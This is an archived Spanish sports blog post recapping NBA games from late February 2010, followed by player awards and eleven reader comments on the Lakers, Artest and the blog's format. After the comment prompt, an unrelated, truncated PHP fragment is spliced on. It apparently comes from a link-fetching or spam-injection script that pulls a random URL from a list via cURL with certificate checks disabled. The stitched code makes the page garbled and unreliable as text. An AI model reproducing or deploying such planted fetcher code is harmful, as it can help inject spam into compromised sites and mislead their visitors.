La crónica (28/02/2010)

01 de March de 2010 por txusma

Llevamos un par de semana sin informe semanal pero es que el tiempo se nos come y además estamos planteándonos si cambiar el “informe semanal” por el “informe mensual”. Como siempre escucharemos con mucho interés vuestras opiniones y si alguien se anima, está perfectamente invitado. De todas maneras, la semana que viene os prometemos volver con nuestros repasos semanales.

Anoche los Lakers dieron un buen golpe de autoridad venciendo al equipo más en forma del Oeste a pesar de un Kobe Bryant horrible en el tiro. Tras 2 derrotas en los partidos previos de la temporada y un flojo inicio de partido, los amarillos apretaron todo lo que se podía apretar en la segunda parte y con un Lamar Odom irreconocible liderando al equipo, se impusieron en un gran último cuarto. No fue un partido de gran calidad pero al final el equipo con más ansia se llevó el choque. Importantísima victoria de cara a recuperar confianza.

Aparte de este duelo en la cumbra se disputaron un par de choques más de los destacados en el Oeste. Por un lado, los Spurs se impusieron a los Suns por bien poquito, posiblemente por el mate fallido que a falta de 40 segundos cometió Jason Richardson y que hubiese supuesto el empate en el marcador. Y por el otro, Dallas consigue su séptima victoria consecutiva y amenaza la segunda plaza del Oeste de los Nuggets. Dirk Nowitzki estuve excepcional desde cualquier punto de vista y acumula una série de partidos buenísimos. Enfrete, unos Hornets que fueron Darren Collison, Marcus Thorton y poco más. Grandes rookies pero… ¿un poco chuponcetes?

En el Este otros dos partidos destacados: paliza de Orlando a Miami, que son una banda por mucho que Wade se esfuerce, y victoria de Atlanta sobre Milwaukee en la prórroga. Salmons (¡qué bien le ha sentado el cambio!) y Stackhouse lo intentaron pero no pudieron frente al arsenal de los Hawks. Eso sí, visto lo visto parecen tener asegurados los playoffs a poco que mantengan el nivel.

Acabando: los Thunder apalizaron a los Raptors, que no contaron con Chris Bosh, los Wizards ganaron por poquito a los Nets de la mano de un Blatche convertido en la figura del equipo tras la marcha de Jamison y Butler y los Kings vencieron a los Clippers.

PREMIOS

MVP: Parece como si Dirk Nowitzki hubiera leído el blog y las discusiones sobre si Gasol este año era el mejor ala-pívot de la liga porque parece completamente picado. 36 puntos, 8 rebotes y 7 asistencias le endosó a los Hornets.

Rookie: Como comentábamos, anoche los Hornets se sustentaron en sus 2 rookies, Darren Collison y Marcus Thorton, que anotaron 35 y 21 puntos respectivamente.

Sorpresa: El irregular Yi Jianlian se puso el mono de trabajo y nos regaló 20 puntos y 19 rebotes.

Decepción: Nadie está acostumbrado a ver un 3 de 17 en tiro de Kobe Bryant y creo que tampoco a ver una actuación tan pobre como la que protagonizó ayer Michael Beasley: 0 de 4, 1 rebote, 2 asistencias y 1 puntito.

Esfuerzo en vano: 41 puntos y 12 rebotes a la basura… ¡Qué debe pensar Amare Stoudamire del mate fallado por su compañero, Jason Richardson!

Comenta

11 comentarios a esta entrada

  1. sayim dice:
    #1

    A mi me gustaban mucho los resumenes semanales, pero entiendo que no tengais tiempo para escribirlos. Aun así, gracias por el esfuerzo que haceis para sacar la cronica todos los dias y otras entradas de vez en cuando, siempre bien escrito…

    Un saludo

      Citar

  2. TheDeerHunter dice:
    #2

    Cuidado… porque calificar como decepción el partido de Bryant no se ajusta demasiado con la realidad. Hay que puntualizar que nos referimos a su contribución anotadora específicamente.
    La segunda parte de los Lakers, posiblemente, sea la culminación defensiva de la temporada y, como señalan varios medios USAnos, pone el listón de lo que podremos ver en los playoffs.
    Diría que no hay equipo en el Oeste que pueda superar esa defensa. La primera vez que puedo decir esto desde que llegó Pau a L.A. (aunque más bien hay que decir que podría estar a la altura de las mejores defensas que se han visto en L.A.)

    En esta línea… y por cosas que se han dicho de Artest. Él es el eje de todo esto… bueno, él y el hecho que Kobe se pueda dedicar a hacer otras cosas que no sean anotar. Kobe ayer fue FUNDAMENTAL… pero lo de Artest fue de manual. Un clínic defensivo en toda regla… y la carica que se le quedó a Melo me sugirió que su cabeza no estaba sólo en el chaparrón que le cayó anoche. Piensa que en playoffs lo puede pasar muy mal con esa pareja de baile. No será el único.

    He leído muchas críticas a Artest de esta temporada (incluido cada vez que Daimiel habla de él) No estoy de acuerdo con ellas. Todas son basadas a su producción estadística, que no es demasiado allá… y hay días que defiende menos brillante que otros. Pero para mí su adaptación al equipo está siendo sencillamente INMEJORABLE a estas alturas. Y yo no hubiera apostado a que se iba a conformar con lanzar a canasta lo poco que lo está haciendo. Hoy por hoy no lo cambiaba por Ariza ni de coña.

      Citar

  3. TheDeerHunter dice:
    #3

    En realidad más que el tiempo en escribirlos, que representa una pequeña parte del problema, la clave es si aportan suficiente información o, por el contrario, se vuelven redundantes y aburridos.
    Además de que hemos escuchado algunas opiniones echando de menos la crónica de los lunes.
    Quizás mensualmente pueden tener más sentido…

      Citar

  4. sayim dice:
    #4

    Yo era de los que echaba de menos la crónica de los lunes, pero ahora echo de menos el informe, espero que la avaricia no rompa el saco.

    A mi si me parecia que aportaban información y no me parecian aburridos. Los leia siempre con interés. Si decidís hacerlos mensualmente, también me parecería bien.

    Con respecto a lo de Artest, parece que también él “lee” el blog. La semana pasada se dejaban caer críticas sobre su rendimiento, pero ayer hizo todo lo que se le pide en LA: intenso en defensa, desquiciando a la estrella rival y anotando los tiros que le correspondan. Sigo pensando que va a ser muy importante su dureza cuando la cosa se ponga seria, le da otro punto a este equipo.

      Citar

  5. Viva_Dirk dice:
    #5

    En el tema Artest estoy con Deer, en los partidos que he visto de Lakers este año ha estado comedido en ataque y siempre bien en defensa. Es un jugador que no me gusta nada, pero creo que esta siendo listo y adaptandose a un rol que puede colocar un anillo es sus dedos.

    La comparación con Ariza habrá que hacerla en play-offs, donde Trevor jugó fenomenal el año pasado.

      Citar

  6. pcerezo dice:
    #6

    Beasley es el ejemplo claro de los peores defectos de esta liga. Ha sido número 2 del draft y da la sensación que o mejora mucho o se queda en un aunténtico bluf.

    Creo que los Lakers saben donde, cuando y con quién se van a jugar las lentejas y ayer era el momento de demostrar de lo que son capaces. Son claros favoritos al título y creo que solo los Cavalieres pueden hacerles frente y forzar siete partidos.

    Ojito a Mavs que el traspaso les ha venido pero que muy bien. Vamos a ver como queda la cosa pero un cruce entre Mavs-Jazz-Nuggets puede ser una eliminatoria tremenda.

    Un saludo,
    Pablo

      Citar

  7. Jona dice:
    #7

    Hombre collison ayer hizo un 15-21 en
    yo le dejaba que chupara todo lo que quisiera jajja

      Citar

  8. Txusma dice:
    #8

    De hecho, iba más por Marcus Thorton que parece un jugador más plano que Collison

      Citar

  9. TheDeerHunter dice:
    #9

    Me llama mucho la atención que no hayamos mencionado la lesión de Shaq, como la pillada a Al Jefferson.

      Citar

  10. kantonyo dice:
    #10

    Deer, eso es señal de que a Shaq ya no lo consideramos clave …

      Citar

  11. Lagarto dice:
    #11

    Por supuesto, Shaq ya no es clave…los años pasan en balde.

    La final ahora mismo parece muy clarita: LAL-CAVS y los cavs ganan o como poco llevan a 7 a LAL.

    Un saludo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>